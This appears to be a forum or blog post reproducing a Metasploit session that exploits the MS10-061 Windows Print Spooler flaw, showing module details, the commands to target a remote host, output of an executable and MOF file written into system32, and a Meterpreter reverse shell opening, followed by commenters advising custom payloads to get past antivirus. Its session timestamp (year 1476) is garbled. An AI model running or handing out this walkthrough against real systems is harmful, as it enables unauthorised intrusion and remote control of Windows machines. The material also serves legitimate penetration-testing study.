msf > use exploit/windows/smb/ms10_061_spoolss
msf exploit(ms10_061_spoolss) > info
Name: Microsoft Print Spooler Service Impersonation Vulnerability
Module: exploit/windows/smb/ms10_061_spoolss
Version: 13208
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent
Provided by:
jduck
hdm
Available targets:
Id Name
-- ----
0 Windows Universal
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PNAME no The printer share name to use on the target
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE spoolss no The named pipe for the spooler service
Payload information:
Space: 1024
Avoid: 0 characters
Description:
This module exploits the RPC service impersonation vulnerability
detailed in Microsoft Bulletin MS10-061. By making a specific DCE
RPC request to the StartDocPrinter procedure, an attacker can
impersonate the Printer Spooler service to create a file. The
working directory at the time is %SystemRoot%\system32. An attacker
can specify any file name, including directory traversal or full
paths. By sending WritePrinter requests, an attacker can fully
control the content of the created file. In order to gain code
execution, this module writes to a directory used by Windows
Management Instrumentation (WMI) to deploy applications. This
directory (Wbem\Mof) is periodically scanned and any new .mof files
are processed automatically. This is the same technique employed by
the Stuxnet code found in the wild.
References:
http://www.osvdb.org/67988
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2729
http://www.microsoft.com/technet/security/bulletin/MS10-061.mspx
msf exploit(ms10_061_spoolss) > set rhost Remote-IP-Address
msf exploit(ms10_061_spoolss) > exploit
[*] Started reverse handler on Local-IP-Address:4444
[*] Trying target Windows Universal...
[*] Binding to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:Remote-IP-Address[\spoolss] ...
[*] Bound to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:Remote-IP-Address[\spoolss] ...
[*] Attempting to exploit MS10-061 via \\IP-Address\PWN-AGFA-Acc ...
[*] Printer handle: 000000008493a66b538fa546865d85bb85e8f036
[*] Job started: 0x2
[*] Wrote 73802 bytes to %SystemRoot%\system32\pDeC6njEHgezu5.exe
[*] Job started: 0x3
[*] Wrote 2224 bytes to %SystemRoot%\system32\wbem\mof\9Y3E56ufs7KWqm.mof
[*] Everything should be set, waiting for a session...
[*] Sending stage (752128 bytes) to Remote-IP-Address
[*] Meterpreter session 4 opened (Local-IP-Address:4444 -> Remote-IP-Address:1033) at 1476-12-06 17:24:48 +0000
meterpreter >
what to do after Sending stage (885806 bytes) to 192.168.1.107
You should see session 1 if not the exploit not worked. If you see session 1 type session -i 1
How long should this whole process take. I am currently stuck at “Everything should be set, waiting for a session…” and it has been a few minutes. Should I try again and start over?
Most likely the box is patched, or AV is blocking the payload. If you know it’s not patched I would try using a custom payload. With regards to your original question it should be fairly instant. 2-5 secs. For custom payloads use “show advanced” this vid shows using custom payloads with psexec but should be the same concept https://youtu.be/36gygYOl5rA